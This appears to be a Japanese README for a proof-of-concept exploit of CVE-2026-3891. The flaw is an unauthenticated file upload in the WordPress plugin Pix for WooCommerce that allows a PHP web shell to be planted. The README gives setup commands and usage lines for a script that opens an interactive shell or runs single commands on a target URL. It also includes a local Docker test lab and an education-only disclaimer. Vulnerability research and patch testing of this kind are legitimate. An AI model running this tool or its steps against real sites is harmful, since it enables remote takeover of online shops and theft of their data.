
Pix for WooCommerce <= 1.5.0 - 未認証の任意ファイルアップロード (CVE-2026-3891) PoC
CVE-2026-3891 は、WordPress プラグイン Pix for WooCommerce における認証なし任意ファイルアップロードの脆弱性です。このプラグインは、認証なしで証明書ファイルのアップロードを受け付ける AJAX エンドポイント (lkn_pix_for_woocommerce_c6_save_settings) を公開しています。nonce は、別の公開エンドポイント (lkn_pix_for_woocommerce_generate_nonce) を介して認証なしで取得できるため、完全に認証されていない攻撃者が PHP ウェブシェルを含む任意のファイルを Web ルートに直接アップロードできます。
影響を受けるバージョン: payment-gateway-pix-for-woocommerce <= 1.5.0
--command で一回限りのコマンドを実行して終了git clone https://github.com/joshuavanderpoll/CVE-2026-3891.git
cd CVE-2026-3891
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-3891.git
cd CVE-2026-3891
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 CVE-2026-3891.py --url <TARGET_URL> [--command <CMD>] [--timeout <SECONDS>] [--useragent <UA>]
ターゲットを悪用し、複数のコマンドを実行できる持続的なインタラクティブシェルセッションに入ります。
python3 CVE-2026-3891.py --url 'https://target.com'

ターゲット上で単一のコマンドを実行して出力を表示します。スクリプトやクイックチェックに便利です。
python3 CVE-2026-3891.py --url 'https://target.com' --command whoami
Single command
脆弱なソフトウェアを含む自己完結型の Docker Compose 環境で、ローカルテスト用です。 詳細は DOCKER.md を確認してください。
cd docker/
docker compose up -d
python3 CVE-2026-3891.py --url 'http://localhost:8080'
このツールは教育および研究目的のみで提供されています。作成者は、このツールの誤用またはそれによって引き起こされた損害について一切の責任を負いません。